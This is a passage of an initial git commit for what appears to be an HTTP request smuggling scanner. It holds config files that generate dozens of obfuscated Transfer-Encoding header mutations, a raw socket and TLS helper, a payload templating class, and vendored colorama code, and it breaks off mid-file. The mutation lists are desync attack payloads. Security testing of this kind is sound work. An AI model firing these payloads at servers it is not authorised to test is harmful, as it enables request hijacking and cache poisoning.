commit b3516c3684a6578d28001bd9dd9f6f999936502e Author: Evan <6956742+defparam@users.noreply.github.com> Date: Thu Jun 11 18:09:46 2020 -0400 initial checkin initial checkin diff --git a/configs/default.py b/configs/default.py new file mode 100644 index 0000000..c40645e --- /dev/null +++ b/configs/default.py @@ -0,0 +1,31 @@ + +def render_template(gadget): + RN = "\r\n" + p = Payload() + p.header = "__METHOD__ __ENDPOINT__?cb=__RANDOM__ HTTP/1.1" + RN + # p.header += "Transfer-Encoding: chunked" +RN + p.header += gadget + RN + p.header += "Host: __HOST__" + RN + p.header += "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.87 Safari/537.36" + RN + p.header += "Content-type: application/x-www-form-urlencoded; charset=UTF-8" + RN + p.header += "Content-Length: __REPLACE_CL__" + RN + return p + + +mutations["nameprefix1"] = render_template(" Transfer-Encoding: chunked") +mutations["tabprefix1"] = render_template("Transfer-Encoding:\tchunked") +mutations["tabprefix2"] = render_template("Transfer-Encoding\t:\tchunked") +mutations["space1"] = render_template("Transfer-Encoding : chunked") + +for i in [0x1,0x4,0x8,0x9,0xa,0xb,0xc,0xd,0x1F,0x20,0x7f,0xA0,0xFF]: + mutations["midspace-%02x"%i] = render_template("Transfer-Encoding:%cchunked"%(i)) + mutations["postspace-%02x"%i] = render_template("Transfer-Encoding%c: chunked"%(i)) + mutations["prespace-%02x"%i] = render_template("%cTransfer-Encoding: chunked"%(i)) + mutations["endspace-%02x"%i] = render_template("Transfer-Encoding: chunked%c"%(i)) + mutations["xprespace-%02x"%i] = render_template("X: X%cTransfer-Encoding: chunked"%(i)) + mutations["endspacex-%02x"%i] = render_template("Transfer-Encoding: chunked%cX: X"%(i)) + mutations["rxprespace-%02x"%i] = render_template("X: X\r%cTransfer-Encoding: chunked"%(i)) + mutations["xnprespace-%02x"%i] = render_template("X: X%c\nTransfer-Encoding: chunked"%(i)) + mutations["endspacerx-%02x"%i] = render_template("Transfer-Encoding: chunked\r%cX: X"%(i)) + mutations["endspacexn-%02x"%i] = render_template("Transfer-Encoding: chunked%c\nX: X"%(i)) + diff --git a/configs/doubles.py b/configs/doubles.py new file mode 100644 index 0000000..6185834 --- /dev/null +++ b/configs/doubles.py @@ -0,0 +1,27 @@ + +def render_template(gadget): + RN = "\r\n" + p = Payload() + p.header = "__METHOD__ __ENDPOINT__?cb=__RANDOM__ HTTP/1.1" + RN + p.header += gadget + RN + p.header += "Host: __HOST__" + RN + p.header += "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.87 Safari/537.36" + RN + p.header += "Content-type: application/x-www-form-urlencoded; charset=UTF-8" + RN + p.header += "Content-Length: __REPLACE_CL__" + RN + return p + +for i in range(0x1,0x21): + mutations["%02x-%02x-XX-XX"%(i,i)] = render_template("%cTransfer-Encoding%c: chunked"%(i,i)) + mutations["%02x-XX-%02x-XX"%(i,i)] = render_template("%cTransfer-Encoding:%cchunked"%(i,i)) + mutations["%02x-XX-XX-%02x"%(i,i)] = render_template("%cTransfer-Encoding: chunked%c"%(i,i)) + mutations["XX-%02x-%02x-XX"%(i,i)] = render_template("Transfer-Encoding%c:%cchunked"%(i,i)) + mutations["XX-%02x-XX-%02x"%(i,i)] = render_template("Transfer-Encoding%c: chunked%c"%(i,i)) + mutations["XX-XX-%02x-%02x"%(i,i)] = render_template("Transfer-Encoding:%cchunked%c"%(i,i)) + +for i in range(0x7F,0x100): + mutations["%02x-%02x-XX-XX"%(i,i)] = render_template("%cTransfer-Encoding%c: chunked"%(i,i)) + mutations["%02x-XX-%02x-XX"%(i,i)] = render_template("%cTransfer-Encoding:%cchunked"%(i,i)) + mutations["%02x-XX-XX-%02x"%(i,i)] = render_template("%cTransfer-Encoding: chunked%c"%(i,i)) + mutations["XX-%02x-%02x-XX"%(i,i)] = render_template("Transfer-Encoding%c:%cchunked"%(i,i)) + mutations["XX-%02x-XX-%02x"%(i,i)] = render_template("Transfer-Encoding%c: chunked%c"%(i,i)) + mutations["XX-XX-%02x-%02x"%(i,i)] = render_template("Transfer-Encoding:%cchunked%c"%(i,i)) \ No newline at end of file diff --git a/configs/exhaustive.py b/configs/exhaustive.py new file mode 100644 index 0000000..2d26025 --- /dev/null +++ b/configs/exhaustive.py @@ -0,0 +1,52 @@ + +def render_template(gadget): + RN = "\r\n" + p = Payload() + p.header = "__METHOD__ __ENDPOINT__?cb=__RANDOM__ HTTP/1.1" + RN + p.header += gadget + RN + p.header += "Host: __HOST__" + RN + p.header += "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.87 Safari/537.36" + RN + p.header += "Content-type: application/x-www-form-urlencoded; charset=UTF-8" + RN + p.header += "Content-Length: __REPLACE_CL__" + RN + return p + +mutations["nameprefix1"] = render_template(" Transfer-Encoding: chunked") +mutations["tabprefix1"] = render_template("Transfer-Encoding:\tchunked") +mutations["tabprefix2"] = render_template("Transfer-Encoding\t:\tchunked") +mutations["spacejoin1"] = render_template("Transfer Encoding: chunked") +mutations["underjoin1"] = render_template("Transfer_Encoding: chunked") +mutations["smashed"] = render_template("Transfer Encoding:chunked") +mutations["space1"] = render_template("Transfer-Encoding : chunked") +mutations["valueprefix1"] = render_template("Transfer-Encoding: chunked") +mutations["vertprefix1"] = render_template("Transfer-Encoding:\u000Bchunked") +mutations["commaCow"] = render_template("Transfer-Encoding: chunked, cow") +mutations["cowComma"] = render_template("Transfer-Encoding: cow, chunked") +mutations["contentEnc"] = render_template("Content-Encoding: chunked") +mutations["linewrapped1"] = render_template("Transfer-Encoding:\n chunked") +mutations["quoted"] = render_template("Transfer-Encoding: \"chunked\"") +mutations["aposed"] = render_template("Transfer-Encoding: 'chunked'") +mutations["lazygrep"] = render_template("Transfer-Encoding: chunk") +mutations["sarcasm"] = render_template("TrAnSFer-EnCODinG: cHuNkeD") +mutations["yelling"] = render_template("TRANSFER-ENCODING: CHUNKED") +mutations["0dsuffix"] = render_template("Transfer-Encoding: chunked\r") +mutations["tabsuffix"] = render_template("Transfer-Encoding: chunked\t") +mutations["revdualchunk"] = render_template("Transfer-Encoding: cow\r\nTransfer-Encoding: chunked") +mutations["0dspam"] = render_template("Transfer\r-Encoding: chunked") +mutations["nested"] = render_template("Transfer-Encoding: cow chunked bar") +mutations["spaceFF"] = render_template("Transfer-Encoding:\xFFchunked") +mutations["accentCH"] = render_template("Transfer-Encoding: ch\x96nked") +mutations["accentTE"] = render_template("Transf\x82r-Encoding: chunked") +mutations["x-rout"] = render_template("X:X\rTransfer-Encoding: chunked") +mutations["x-nout"] = render_template("X:X\nTransfer-Encoding: chunked") +for i in range(0x1,0x20): + mutations["midspace-%02x"%i] = render_template("Transfer-Encoding:%cchunked"%(i)) + mutations["postspace-%02x"%i] = render_template("Transfer-Encoding%c: chunked"%(i)) + mutations["prespace-%02x"%i] = render_template("%cTransfer-Encoding: chunked"%(i)) + mutations["endspace-%02x"%i] = render_template("Transfer-Encoding: chunked%c"%(i)) + +for i in range(0x7F,0x100): + mutations["midspace-%02x"%i] = render_template("Transfer-Encoding:%cchunked"%(i)) + mutations["postspace-%02x"%i] = render_template("Transfer-Encoding%c: chunked"%(i)) + mutations["prespace-%02x"%i] = render_template("%cTransfer-Encoding: chunked"%(i)) + mutations["endspace-%02x"%i] = render_template("Transfer-Encoding: chunked%c"%(i)) + diff --git a/lib/EasySSL.py b/lib/EasySSL.py new file mode 100644 index 0000000..cd5102f --- /dev/null +++ b/lib/EasySSL.py @@ -0,0 +1,178 @@ +#!/usr/bin/python +# MIT License +# +# Copyright (c) 2020 Evan Custodio +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. +import socket, ssl +import time + +# EasySSL: A simple module to perform SSL Queries +class EasySSL(): + # constructor: we can specify recv bufsize + def __init__(self, SSLFlag = True, bufsize=8192): + self.bufsize = bufsize + self.SSLFlag = SSLFlag + + # connect() - Simply provide webserver address and optional port (default 443) + def connect(self,host,port=443,timeout=None): + # 1) Create an SSL context to wrap our socket + # 2) Create our socket + # 3) Wrap our socket + # 4) Connect + if (self.SSLFlag): + self.context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2) + self.s = socket.setdefaulttimeout(timeout) + self.s = socket.create_connection((host, port)) + self.ssl = self.context.wrap_socket(self.s, server_hostname=host) + self.ssl.settimeout(timeout) + else: + self.s = socket.setdefaulttimeout(timeout) + self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + self.s.settimeout(timeout) + self.s.connect((host, port)) + + + def close(self): + if (self.SSLFlag): + self.ssl.close() + del self.ssl + del self.context + del self.s + else: + self.s.close() + del self.s + + # send() - Sends data through the socket + def send(self, data): + if (self.SSLFlag): + return self.ssl.send(data) + else: + return self.s.send(data) + + def recv(self): + try: + if (self.SSLFlag): + self.ssl.settimeout(None) + buffer = self.ssl.recv(self.bufsize) + else: + self.s.settimeout(None) + buffer = self.s.recv(self.bufsize) + + except Exception as e: + buffer = None + #print (e) + return buffer + + def recv_nb(self,timeout=0.0): + try: + + if (self.SSLFlag): + self.ssl.settimeout(timeout) + buffer = self.ssl.recv(self.bufsize) + else: + self.s.settimeout(timeout) + buffer = self.s.recv(self.bufsize) + + except Exception as e: + buffer = None + #print (e) + return buffer + + # recv_web is an HTTP response parser. This parser has been hacked together and probably doesn't conform to RFC + # please do not use this for any serious HTTP response parsing. Only meant for security research + def recv_web(self): + ST_PROCESS_HEADERS = 0 + ST_PROCESS_BODY_CL = 1 + ST_PROCESS_BODY_TE = 2 + ST_PROCESS_BODY_NODATA = 3 + + state = ST_PROCESS_HEADERS + dat_raw = b"" + CL_TE = -1 + size = 0 + k = 0 + cls = False + http_ver = "1.1" # assume 1.1, this will get overwritten + while(1): + #time.sleep(0.01) + #k += 1 + #print ("loop %d" %(k)) + #print ("state = %d"%(state)) + retry = 0 + while (1): + + sample = self.recv_nb(1) + if ((sample == None) or (sample == b"")): + if (retry == 5): + if len(dat_raw) == 0: + cls = True + return (cls, dat_raw.decode("UTF-8",'ignore')) + retry += 1 + else: + dat_raw += sample + break + + dat_dec = dat_raw.decode("UTF-8",'ignore') + dat_split = dat_dec.split("\r\n") + + if (state == ST_PROCESS_HEADERS): + if dat_split[0][0:4] == "HTTP": + #print("Found HTTP") + http_ver = dat_split[0][5:8] + if (http_ver == "1.0"): + cls = True + state = ST_PROCESS_HEADERS + for line in dat_split: + if (len(line) >= len("Transfer-Encoding:")) and (line[0:18].lower() == "transfer-encoding:"): + #print ("Found TE Header") + CL_TE = 1 + elif (len(line) >= len("Content-Length:")) and (line[0:15].lower() == "content-length:"): + size = int(line[15:].strip()) + #print ("Found CL Header: Size %d" % (size)) + CL_TE = 0 + elif (len(line) >= len("Connection: close")) and (line[0:17].lower() == "connection: close"): + cls = True + elif (len(line) >= len("Connection: keep-alive")) and (line[0:22] == "connection: keep-alive"): + cls = False + elif (line == ""): + #print ("Found end of headers") + if (CL_TE == 0): + state = ST_PROCESS_BODY_CL + elif (CL_TE == 1): + state = ST_PROCESS_BODY_TE + else: + state = ST_PROCESS_NODATA + return (cls, dat_dec) + break + + if (state == ST_PROCESS_BODY_CL): + start = dat_dec.find("\r\n\r\n")+4 + #print ("%d %d " % (len(dat_raw)-start,size)) + if (len(dat_raw)-start) == size: + return (cls, dat_dec) + + if (state == ST_PROCESS_BODY_TE): + # FIXME: This is a terrible hack and can easily break + # replace with an implementation that tracks the chunked lengths + if dat_dec[-5:] == "0\r\n\r\n": + return (cls, dat_dec) + + + \ No newline at end of file diff --git a/lib/Payload.py b/lib/Payload.py new file mode 100644 index 0000000..b7858bd --- /dev/null +++ b/lib/Payload.py @@ -0,0 +1,73 @@ +#!/usr/bin/python +# MIT License +# +# Copyright (c) 2020 Evan Custodio +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. +import random +import re + +RN = "\r\n" +EndChunk = "0\r\n\r\n" +def Chunked(data): + return hex(len(data))[2:]+RN+data+RN + +class Payload(): + def __init__(self, host=None): + self.header = None + self.body = None + self.method = "GET" + self.endpoint = "/" + self.host = host + self.cl = -1 + + def __str__(self): + def replace_random(match): + return str(random.random()).split('.')[1] + + + if (self.header == None): + raise AttributeError("No header data specified in Payload instance") + if (self.body == None): + raise AttributeError("No body data specified in Payload instance") + if (self.host == None): + raise AttributeError("No host specified in Payload instance") + + result = self.header + RN + self.body + result = re.sub("__RANDOM__",replace_random,result) + + if (self.cl < 0): + result = re.sub("__REPLACE_CL__",str(len(self.body)),result) + else: + result = re.sub("__REPLACE_CL__",str(self.cl),result) + + result = re.sub("__METHOD__",self.method,result) + result = re.sub("__ENDPOINT__",self.endpoint,result) + result = re.sub("__HOST__",self.host,result) + + return (result) + + def __setattr__(self, name, value): + if name == "body" and (type("string") != type(value) and value != None): + raise AttributeError("Only string types allowed") + if name == "header" and (type("string") != type(value) and value != None): + raise AttributeError("Only string types allowed") + if name == "host" and (type("string") != type(value) and value != None): + raise AttributeError("Only string types allowed") + self.__dict__[name] = value diff --git a/lib/__init__.py b/lib/__init__.py new file mode 100644 index 0000000..2ae2839 --- /dev/null +++ b/lib/__init__.py @@ -0,0 +1 @@ +pass diff --git a/lib/__pycache__/EasySSL.cpython-36.pyc b/lib/__pycache__/EasySSL.cpython-36.pyc new file mode 100644 index 0000000..5060a71 Binary files /dev/null and b/lib/__pycache__/EasySSL.cpython-36.pyc differ diff --git a/lib/__pycache__/Payload.cpython-36.pyc b/lib/__pycache__/Payload.cpython-36.pyc new file mode 100644 index 0000000..796be10 Binary files /dev/null and b/lib/__pycache__/Payload.cpython-36.pyc differ diff --git a/lib/__pycache__/__init__.cpython-36.pyc b/lib/__pycache__/__init__.cpython-36.pyc new file mode 100644 index 0000000..2b86c74 Binary files /dev/null and b/lib/__pycache__/__init__.cpython-36.pyc differ diff --git a/lib/colorama/__init__.py b/lib/colorama/__init__.py new file mode 100644 index 0000000..2a3bf47 --- /dev/null +++ b/lib/colorama/__init__.py @@ -0,0 +1,6 @@ +# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file. +from .initialise import init, deinit, reinit, colorama_text +from .ansi import Fore, Back, Style, Cursor +from .ansitowin32 import AnsiToWin32 + +__version__ = '0.4.1' diff --git a/lib/colorama/__pycache__/__init__.cpython-36.pyc b/lib/colorama/__pycache__/__init__.cpython-36.pyc new file mode 100644 index 0000000..eeb15ee Binary files /dev/null and b/lib/colorama/__pycache__/__init__.cpython-36.pyc differ diff --git a/lib/colorama/__pycache__/ansi.cpython-36.pyc b/lib/colorama/__pycache__/ansi.cpython-36.pyc new file mode 100644 index 0000000..ce1d911 Binary files /dev/null and b/lib/colorama/__pycache__/ansi.cpython-36.pyc differ diff --git a/lib/colorama/__pycache__/ansitowin32.cpython-36.pyc b/lib/colorama/__pycache__/ansitowin32.cpython-36.pyc new file mode 100644 index 0000000..7f1daf2 Binary files /dev/null and b/lib/colorama/__pycache__/ansitowin32.cpython-36.pyc differ diff --git a/lib/colorama/__pycache__/initialise.cpython-36.pyc b/lib/colorama/__pycache__/initialise.cpython-36.pyc new file mode 100644 index 0000000..09bd98c Binary files /dev/null and b/lib/colorama/__pycache__/initialise.cpython-36.pyc differ diff --git a/lib/colorama/__pycache__/win32.cpython-36.pyc b/lib/colorama/__pycache__/win32.cpython-36.pyc new file mode 100644 index 0000000..8516ee6 Binary files /dev/null and b/lib/colorama/__pycache__/win32.cpython-36.pyc differ diff --git a/lib/colorama/__pycache__/winterm.cpython-36.pyc b/lib/colorama/__pycache__/winterm.cpython-36.pyc new file mode 100644 index 0000000..611f9bd Binary files /dev/null and b/lib/colorama/__pycache__/winterm.cpython-36.pyc differ diff --git a/lib/colorama/ansi.py b/lib/colorama/ansi.py new file mode 100644 index 0000000..7877658 --- /dev/null +++ b/lib/colorama/ansi.py @@ -0,0 +1,102 @@ +# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file. +''' +This module generates ANSI character codes to printing colors to terminals. +See: http://en.wikipedia.org/wiki/ANSI_escape_code +''' + +CSI = '\033[' +OSC = '\033]' +BEL = '\007' + + +def code_to_chars(code): + return CSI + str(code) + 'm' + +def set_title(title): + return OSC + '2;' + title + BEL + +def clear_screen(mode=2): + return CSI + str(mode) + 'J' + +def clear_line(mode=2): + return CSI + str(mode) + 'K' + + +class AnsiCodes(object): + def __init__(self): + # the subclasses declare class attributes which are numbers. + # Upon instantiation we define instance attributes, which are the same + # as the class attributes but wrapped with the ANSI escape sequence + for name in dir(self): + if not name.startswith('_'): + value = getattr(self, name) + setattr(self, name, code_to_chars(value)) + + +class AnsiCursor(object): + def UP(self, n=1): + return CSI + str(n) + 'A' + def DOWN(self, n=1): + return CSI + str(n) + 'B' + def FORWARD(self, n=1): + return CSI + str(n) + 'C' + def BACK(self, n=1): + return CSI + str(n) + 'D' + def POS(self, x=1, y=1): + return CSI + str(y) + ';' + str(x) + 'H' + + +class AnsiFore(AnsiCodes): + BLACK = 30 + RED = 31 + GREEN = 32 + YELLOW = 33 + BLUE = 34 + MAGENTA = 35 + CYAN = 36 + WHITE = 37 + RESET = 39 + + # These are fairly well supported, but not part of the standard. + LIGHTBLACK_EX = 90 + LIGHTRED_EX = 91 + LIGHTGREEN_EX = 92 + LIGHTYELLOW_EX = 93 + LIGHTBLUE_EX = 94 + LIGHTMAGENTA_EX = 95 + LIGHTCYAN_EX = 96 + LIGHTWHITE_EX = 97 + + +class AnsiBack(AnsiCodes): + BLACK = 40 + RED = 41 + GREEN = 42 + YELLOW = 43 + BLUE = 44 + MAGENTA = 45 + CYAN = 46 + WHITE = 47 + RESET = 49 + + # These are fairly well supported, but not part of the standard. + LIGHTBLACK_EX = 100 + LIGHTRED_EX = 101 + LIGHTGREEN_EX = 102 + LIGHTYELLOW_EX = 103 + LIGHTBLUE_EX = 104 + LIGHTMAGENTA_EX = 105 + LIGHTCYAN_EX = 106 + LIGHTWHITE_EX = 107 + + +class AnsiStyle(AnsiCodes): + BRIGHT = 1 + DIM = 2 + NORMAL = 22 + RESET_ALL = 0 + +Fore = AnsiFore() +Back = AnsiBack() +Style = AnsiStyle() +Cursor = AnsiCursor() diff --git a/lib/colorama/ansitowin32.py b/lib/colorama/ansitowin32.py new file mode 100644 index 0000000..359c92b --- /dev/null +++ b/lib/colorama/ansitowin32.py @@ -0,0 +1,257 @@ +# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file. +import re +import sys +import os + +from .ansi import AnsiFore, AnsiBack, AnsiStyle, Style +from .winterm import WinTerm, WinColor, WinStyle +from .win32 import windll, winapi_test + + +winterm = None +if windll is not None: + winterm = WinTerm() + + +class StreamWrapper(object): + ''' + Wraps a stream (such as stdout), acting as a transparent proxy for all + attribute access apart from method 'write()', which is delegated to our + Converter instance. + ''' + def __init__(self, wrapped, converter): + # double-underscore everything to prevent clashes with names of + # attributes on the wrapped stream object. + self.__wrapped = wrapped + self.__convertor = converter + + def __getattr__(self, name): + return getattr(self.__wrapped, name) + + def __enter__(self, *args, **kwargs): + # special method lookup bypasses __getattr__/__getattribute__, see + # https://stackoverflow.com/questions/12632894/why-doesnt-getattr-work-with-exit + # thus, contextlib magic methods are not proxied via __getattr__ + return self.__wrapped.__enter__(*args, **kwargs) + + def __exit__(self, *args, **kwargs): + return self.__wrapped.__exit__(*args, **kwargs) + + def write(self, text): + self.__convertor.write(text) + + def isatty(self): + stream = self.__wrapped + if 'PYCHARM_HOSTED' in os.environ: + if stream is not None and (stream is sys.__stdout__ or stream is sys.__stderr__): + return True + try: + stream_isatty = stream.isatty + except AttributeError: + return False + else: + return stream_isatty() + + @property + def closed(self): + stream = self.__wrapped + try: + return stream.closed + except AttributeError: + return True + + +class AnsiToWin32(object): + ''' + Implements a 'write()' method which, on Windows, will strip ANSI character + sequences from the text, and if outputting to a tty, will convert them into + win32 function calls. + ''' + ANSI_CSI_RE = re.compile('\001?\033\\[((?:\\d|;)*)([a-zA-Z])\002?') # Control Sequence Introducer + ANSI_OSC_RE = re.compile('\001?\033\\]((?:.|;)*?)(\x07)\002?') # Operating System Command + + def __init__(self, wrapped, convert=None, strip=None, autoreset=False): + # The wrapped stream (normally sys.stdout or sys.stderr) + self.wrapped = wrapped + + # should we reset colors to defaults after every .write() + self.autoreset = autoreset + + # create the proxy wrapping our output stream + self.stream = StreamWrapper(wrapped, self) + + on_windows = os.name == 'nt' + # We test if the WinAPI works, because even if we are on Windows + # we may be using a terminal that doesn't support the WinAPI + # (e.g. Cygwin Terminal). In this case it's up to the terminal + # to support the ANSI codes. + conversion_supported = on_windows and winapi_test() + + # should we strip ANSI sequences from our output? + if strip is None: + strip = conversion_supported or (not self.stream.closed and not self.stream.isatty()) + self.strip = strip + + # should we should convert ANSI sequences into win32 calls? + if convert is None: + convert = conversion_supported and not self.stream.closed and self.stream.isatty() + self.convert = convert + + # dict of ansi codes to win32 functions and parameters + self.win32_calls = self.get_win32_calls() + + # are we wrapping stderr? + self.on_stderr = self.wrapped is sys.stderr + + def should_wrap(self): + ''' + True if this class is actually needed. If false, then the output + stream will not be affected, nor will win32 calls be issued, so + wrapping stdout is not actually required. This will generally be + False on non-Windows platforms, unless optional functionality like + autoreset has been requested using kwargs to init() + ''' + return self.convert or self.strip or self.autoreset + + def get_win32_calls(self): + if self.convert and winterm: + return { + AnsiStyle.RESET_ALL: (winterm.reset_all, ), + AnsiStyle.BRIGHT: (winterm.style, WinStyle.BRIGHT), + AnsiStyle.DIM: (winterm.style, WinStyle.NORMAL), + AnsiStyle.NORMAL: (winterm.style, WinStyle.NORMAL), + AnsiFore.BLACK: (winterm.fore, WinColor.BLACK), + AnsiFore.RED: (winterm.fore, WinColor.RED), + AnsiFore.GREEN: (winterm.fore, WinColor.GREEN), + AnsiFore.YELLOW: (winterm.fore, WinColor.YELLOW), + AnsiFore.BLUE: (winterm.fore, WinColor.BLUE), + AnsiFore.MAGENTA: (winterm.fore, WinColor.MAGENTA), + AnsiFore.CYAN: (winterm.fore, WinColor.CYAN), + AnsiFore.WHITE: (winterm.fore, WinColor.GREY), + AnsiFore.RESET: (winterm.fore, ), + AnsiFore.LIGHTBLACK_EX: (winterm.fore, WinColor.BLACK, True), + AnsiFore.LIGHTRED_EX: (winterm.fore, WinColor.RED, True), + AnsiFore.LIGHTGREEN_EX: (winterm.fore, WinColor.GREEN, True), + AnsiFore.LIGHTYELLOW_EX: (winterm.fore, WinColor.YELLOW, True), + AnsiFore.LIGHTBLUE_EX: (winterm.fore, WinColor.BLUE, True), + AnsiFore.LIGHTMAGENTA_EX: (winterm.fore, WinColor.MAGENTA, True), + AnsiFore.LIGHTCYAN_EX: (winterm.fore, WinColor.CYAN, True), + AnsiFore.LIGHTWHITE_EX: (winterm.fore, WinColor.GREY, True), + AnsiBack.BLACK: (winterm.back, WinColor.BLACK), + AnsiBack.RED: (winterm.back, WinColor.RED), + AnsiBack.GREEN: (winterm.back, WinColor.GREEN), + AnsiBack.YELLOW: (winterm.back, WinColor.YELLOW), + AnsiBack.BLUE: (winterm.back, WinColor.BLUE), + AnsiBack.MAGENTA: (winterm.back, WinColor.MAGENTA), + AnsiBack.CYAN: (winterm.back, WinColor.CYAN), + AnsiBack.WHITE: (winterm.back, WinColor.GREY), + AnsiBack.RESET: (winterm.back, ), + AnsiBack.LIGHTBLACK_EX: (winterm.back, WinColor.BLACK, True), + AnsiBack.LIGHTRED_EX: (winterm.back, WinColor.RED, True), + AnsiBack.LIGHTGREEN_EX: (winterm.back, WinColor.GREEN, True), + AnsiBack.LIGHTYELLOW_EX: (winterm.back, WinColor.YELLOW, True), + AnsiBack.LIGHTBLUE_EX: (winterm.back, WinColor.BLUE, True), + AnsiBack.LIGHTMAGENTA_EX: (winterm.back, WinColor.MAGENTA, True), + AnsiBack.LIGHTCYAN_EX: (winterm.back, WinColor.CYAN, True), + AnsiBack.LIGHTWHITE_EX: (winterm.back, WinColor.GREY, True), + } + return dict() + + def write(self, text): + if self.strip or self.convert: + self.write_and_convert(text) + else: + self.wrapped.write(text) + self.wrapped.flush() + if self.autoreset: + self.reset_all() + + + def reset_all(self): + if self.convert: + self.call_win32('m', (0,)) + elif not self.strip and not self.stream.closed: + self.wrapped.write(Style.RESET_ALL) + + + def write_and_convert(self, text): + ''' + Write the given text to our wrapped stream, stripping any ANSI + sequences from the text, and optionally converting them into win32 + calls. + ''' + cursor = 0 + text = self.convert_osc(text) + for match in self.ANSI_CSI_RE.finditer(text): + start, end = match.span() + self.write_plain_text(text, cursor, start) + self.convert_ansi(*match.groups()) + cursor = end + self.write_plain_text(text, cursor, len(text)) + + + def write_plain_text(self, text, start, end): + if start < end: + self.wrapped.write(text[start:end]) + self.wrapped.flush() + + + def convert_ansi(self, paramstring, command): + if self.convert: + params = self.extract_params(command, paramstring) + self.call_win32(command, params) + + + def extract_params(self, command, paramstring): + if command in 'Hf': + params = tuple(int(p) if len(p) != 0 else 1 for p in paramstring.split(';')) + while len(params) < 2: + # defaults: + params = params + (1,) + else: + params = tuple(int(p) for p in paramstring.split(';') if len(p) != 0) + if len(params) == 0: + # defaults: + if command in 'JKm': + params = (0,) + elif command in 'ABCD': + params = (1,) + + return params + + + def call_win32(self, command, params): + if command == 'm': + for param in params: + if param in self.win32_calls: + func_args = self.win32_calls[param] + func = func_args[0] + args = func_args[1:] + kwargs = dict(on_stderr=self.on_stderr) + func(*args, **kwargs) + elif command in 'J': + winterm.erase_screen(params[0], on_stderr=self.on_stderr) + elif command in 'K': + winterm.erase_line(params[0], on_stderr=self.on_stderr) + elif command in 'Hf': # cursor position - absolute + winterm.set_cursor_position(params, on_stderr=self.on_stderr) + elif command in 'ABCD': # cursor position - relative + n = params[0] + # A - up, B - down, C - forward, D - back + x, y = {'A': (0, -n), 'B': (0, n), 'C': (n, 0), 'D': (-n, 0)}[command] + winterm.cursor_adjust(x, y, on_stderr=self.on_stderr) + + + def convert_osc(self, text): + for match in self.ANSI_OSC_RE.finditer(text): + start, end = match.span() + text = text[:start] + text[end:] + paramstring, command = match.groups() + if command in '\x07': # \x07 = BEL + params = paramstring.split(";") + # 0 - change title and icon (we will only change title) + # 1 - change icon (we don't support this) + # 2 - change title + if params[0] in '02': + winterm.set_title(params[1]) + return text diff --git a/lib/colorama/initialise.py b/lib/colorama/initialise.py new file mode 100644 index 0000000..430d066 --- /dev/null +++ b/lib/colorama/initialise.py @@ -0,0 +1,80 @@ +# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file. +import atexit +import contextlib +import sys + +from .ansitowin32 import AnsiToWin32 + + +orig_stdout = None +orig_stderr = None + +wrapped_stdout = None +wrapped_stderr = None + +atexit_done = False + + +def reset_all(): + if AnsiToWin32 is not None: # Issue #74: objects might become None at exit + AnsiToWin32(orig_stdout).reset_all() + + +def init(autoreset=False, convert=None, strip=None, wrap=True): + + if not wrap and any([autoreset, convert, strip]): + raise ValueError('wrap=False conflicts with any other arg=True') + + global wrapped_stdout, wrapped_stderr + global orig_stdout, orig_stderr + + orig_stdout = sys.stdout + orig_stderr = sys.stderr + + if sys.stdout is None: + wrapped_stdout = None + else: + sys.stdout = wrapped_stdout = \ + wrap_stream(orig_stdout, convert, strip, autoreset, wrap) + if sys.stderr is None: + wrapped_stderr = None + else: + sys.stderr = wrapped_stderr = \ + wrap_stream(orig_stderr, convert, strip, autoreset, wrap) + + global atexit_done + if not atexit_done: + atexit.register(reset_all) + atexit_done = True + + +def deinit(): + if orig_stdout is not None: + sys.stdout = orig_stdout + if orig_stderr is not None: + sys.stderr = orig_stderr + + +@contextlib.contextmanager +def colorama_text(*args, **kwargs): + init(*args, **kwargs) + try: + yield + finally: + deinit() + + +def reinit(): + if wrapped_stdout is not None: + sys.stdout = wrapped_stdout + if 